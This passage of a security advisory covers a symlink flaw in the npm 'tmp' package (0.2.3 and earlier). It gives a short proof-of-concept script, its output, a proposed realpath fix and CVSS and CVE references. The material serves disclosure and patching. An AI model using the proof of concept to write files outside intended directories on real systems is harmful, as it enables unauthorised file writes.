ls -lha $HOME/mydir1 | grep "tmp-"
```

- run the poc
```bash
node main.js
File:  /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".
```

- the temporary file is created under `$HOME/mydir1` (outside the `tmpDir`):
```bash
ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user    0 Apr  X XX:XX tmp-[random-id]
```


- `main.js`
```js
// npm i tmp@0.2.3

const tmp = require('tmp');

const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);

try {
    tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
    console.log('test 1:', err.message)
}

try {
    tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
    console.log('test 2:', err.message)
}

try {
    const fs = require('node:fs');
    const resolved = fs.realpathSync('/tmp/evil-dir');
    tmp.fileSync({ 'dir': resolved});
} catch (err) {
    console.log('test 3:', err.message)
}
```


A Potential fix could be to call `fs.realpathSync` (or similar) that resolves also symbolic links.
```js
function _resolvePath(name, tmpDir) {
  let resolvedPath;
  if (name.startsWith(tmpDir)) {
    resolvedPath = path.resolve(name);
  } else {
    resolvedPath = path.resolve(path.join(tmpDir, name));
  }
  return fs.realpathSync(resolvedPath);
}
```


### Impact

Arbitrary temporary file / directory write via symlink

• Base Score: LOW (2.5)
• Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N

• Severity: low

• NPM Advisory reference: - https://github.com/advisories/GHSA-52f5-9888-hmc6
• NPM Advisory reference: - https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b
• NPM Advisory reference: - https://github.com/raszi/node-tmp/issues/207
• NPM Advisory reference: - https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6
• NPM Advisory reference: - https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html
• NPM Advisory reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-54798

Vulnerable Software & Versions (NPM):

• cpe:2.3:a:*:tmp:\<\=0.2.3:*:*:*:*:*:*:*